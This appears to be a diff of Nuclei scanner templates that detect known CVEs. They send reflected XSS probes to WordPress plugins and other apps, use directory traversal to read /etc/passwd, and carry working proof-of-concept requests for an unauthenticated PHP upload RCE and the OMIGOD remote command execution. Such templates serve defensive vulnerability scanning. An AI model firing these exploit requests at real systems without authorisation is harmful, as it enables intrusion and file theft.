- type: word
|
||||
words:
|
||||
- "'><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4558
|
||||
|
||||
info:
|
||||
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4558
|
||||
cwe-id: CWE-79
|
||||
description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4561
|
||||
|
||||
info:
|
||||
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4561
|
||||
cwe-id: CWE-79
|
||||
description: "The ultimate-weather plugin 1.0 for WordPress has XSS"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4592
|
||||
|
||||
info:
|
||||
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4592
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4592
|
||||
cwe-id: CWE-79
|
||||
description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2014-5111
|
||||
|
||||
info:
|
||||
name: Fonality trixbox - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/39351
|
||||
- https://www.cvedetails.com/cve/CVE-2014-5111
|
||||
tags: cve,cve2014,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2014-5258
|
||||
|
||||
info:
|
||||
name: webEdition 6.3.8.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/34761
|
||||
- https://www.cvedetails.com/cve/CVE-2014-5258
|
||||
tags: cve,cve2014,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,9 +4,9 @@ info:
|
|||
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
|
||||
tags: cve,2014,wordpress,xss,wp-plugin
|
||||
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
|
||||
tags: cve,cve2014,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -18,7 +18,6 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
@ -7,13 +7,13 @@ info:
|
|||
reference:
|
||||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2015-1000012
|
||||
cwe-id: CWE-200
|
||||
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
|
||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2015-2067
|
||||
|
||||
info:
|
||||
name: Magento Server Magmi Plugin - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/35996
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
|
||||
tags: cve,cve2015,lfi,magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2015-2068
|
||||
|
||||
info:
|
||||
name: Magento Server Magmi Plugin - Cross Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/35996
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
|
||||
tags: cve,cve2015,magento,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2015-4414
|
||||
|
||||
info:
|
||||
name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/37274
|
||||
- https://www.cvedetails.com/cve/CVE-2015-4414
|
||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2015-4632
|
||||
|
||||
info:
|
||||
name: Koha 3.20.1 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/37388
|
||||
- https://www.cvedetails.com/cve/CVE-2015-4632
|
||||
tags: cve,cve2015,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2015-4632
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2015-6920
|
||||
|
||||
info:
|
||||
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/133371/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920
|
||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2015-7377
|
||||
|
||||
info:
|
||||
name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-7377
|
||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||
description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2015-7780
|
||||
|
||||
info:
|
||||
name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/35933
|
||||
- https://www.cvedetails.com/cve/CVE-2015-7780/
|
||||
tags: cve,cve2015,lfi,manageengine
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 6.50
|
||||
cve-id: CVE-2015-7780
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "</web-app>"
|
||||
- "java.sun.com"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/xml"
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2016-1000136
|
||||
|
||||
info:
|
||||
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin heat-trackr v1.0
|
||||
reference:
|
||||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2016-1000136
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2016-1000142
|
||||
|
||||
info:
|
||||
name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
|
||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2016-1000142
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2016-1000143
|
||||
|
||||
info:
|
||||
name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
|
||||
reference:
|
||||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=780
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
|
||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2016-1000143
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,8 +1,8 @@
|
|||
id: CVE-2018-15473
|
||||
|
||||
info:
|
||||
name: OpenSSH Username Enumeration
|
||||
author: r3dg33k,daffainfo
|
||||
name: OpenSSH Username Enumeration <= v7.7
|
||||
author: r3dg33k,daffainfo,forgedhallpass
|
||||
severity: medium
|
||||
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
|
||||
|
@ -21,4 +21,9 @@ network:
|
|||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- 'SSH-2.0-OpenSSH_[1-7].*'
|
||||
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?i)SSH-2.0-OpenSSH_[^\r]+'
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-9205
|
||||
|
||||
info:
|
||||
name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/44501
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
|
||||
tags: cve,cve2018,lfi,drupal
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2018-9205
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-24499
|
||||
|
||||
info:
|
||||
name: Workreap WordPress theme - unauthenticated RCE
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
|
||||
reference:
|
||||
- https://github.com/RyouYoo/CVE-2021-24499
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24499
|
||||
tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-24499
|
||||
cwe-id: CWE-434
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
-----------------------------cd0dc6bdc00b1cf9
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
||||
workreap_award_temp_file_uploader
|
||||
-----------------------------cd0dc6bdc00b1cf9
|
||||
Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
|
||||
Content-Type: application/x-httpd-php
|
||||
|
||||
<?php echo md5("CVE-2021-24499"); ?>
|
||||
-----------------------------cd0dc6bdc00b1cf9--
|
||||
|
||||
- |
|
||||
GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "71abe5077dae2754c36d731cc1534d4d"
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2021-30049
|
||||
|
||||
info:
|
||||
name: SysAid Technologies 20.3.64 b14 Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI.
|
||||
reference:
|
||||
- https://eh337.net/2021/03/30/sysaid/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049
|
||||
tags: cve,cve2021,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-30049
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,68 @@
|
|||
id: CVE-2021-38647
|
||||
|
||||
info:
|
||||
name: OMIGOD - Open Management Infrastructure RCE
|
||||
author: daffainfo,xstp
|
||||
severity: critical
|
||||
tags: cve,cve2021,rce,omi,microsoft
|
||||
description: Open Management Infrastructure Remote Code Execution Vulnerability
|
||||
reference:
|
||||
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
|
||||
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
|
||||
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
|
||||
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
|
||||
- https://github.com/microsoft/omi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-38647
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wsman HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/soap+xml;charset=UTF-8
|
||||
|
||||
<s:Envelope
|
||||
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
|
||||
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
|
||||
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
|
||||
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
|
||||
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
|
||||
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
|
||||
<s:Header>
|
||||
<a:To>HTTP://{{Hostname}}/wsman/</a:To>
|
||||
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
|
||||
<a:ReplyTo>
|
||||
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
|
||||
</a:ReplyTo>
|
||||
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
|
||||
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
|
||||
<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
|
||||
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
|
||||
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
|
||||
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
|
||||
<w:OptionSet s:mustUnderstand="true"/>
|
||||
<w:SelectorSet>
|
||||
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
|
||||
</w:SelectorSet>
|
||||
</s:Header>
|
||||
<s:Body>
|
||||
<p:ExecuteScript_INPUT
|
||||
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
|
||||
<p:Script>aWQ=</p:Script>
|
||||
<p:Arguments/>
|
||||
<p:timeout>0</p:timeout>
|
||||
<p:b64encoded>true</p:b64encoded>
|
||||
</p:ExecuteScript_INPUT>
|
||||
</s:Body>
|
||||
</s:Envelope>
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<p:StdOut>'
|
||||
- 'uid=0(root) gid=0(root) groups=0'
|
||||
condition: and
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-39316
|
||||
|
||||
info:
|
||||
name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
